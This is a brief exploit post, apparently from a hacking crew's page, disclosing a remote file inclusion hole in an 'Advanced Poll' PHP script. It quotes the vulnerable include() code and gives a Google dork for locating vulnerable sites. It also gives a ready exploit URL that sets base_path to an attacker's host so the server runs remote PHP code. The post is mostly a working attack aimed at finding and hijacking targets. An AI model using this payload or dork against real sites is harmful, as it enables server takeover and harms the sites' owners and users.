#############################SolpotCrew Community################################
#################################################################################
################################################################################
###############################################################################
Input passed to the "base_path" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from /admin/common.inc.php
$pollvars['SELF'] = basename($PHP_SELF);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
include ("$base_path/lang/$pollvars[lang]");
} else {
include ("$base_path/lang/english.php");
google dork : inurl:comments.php?action= send id
EXPLOIT :
http://somehost/[path_advanced_poll]/admin/common.inc.php?base_path=http://atacker
##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################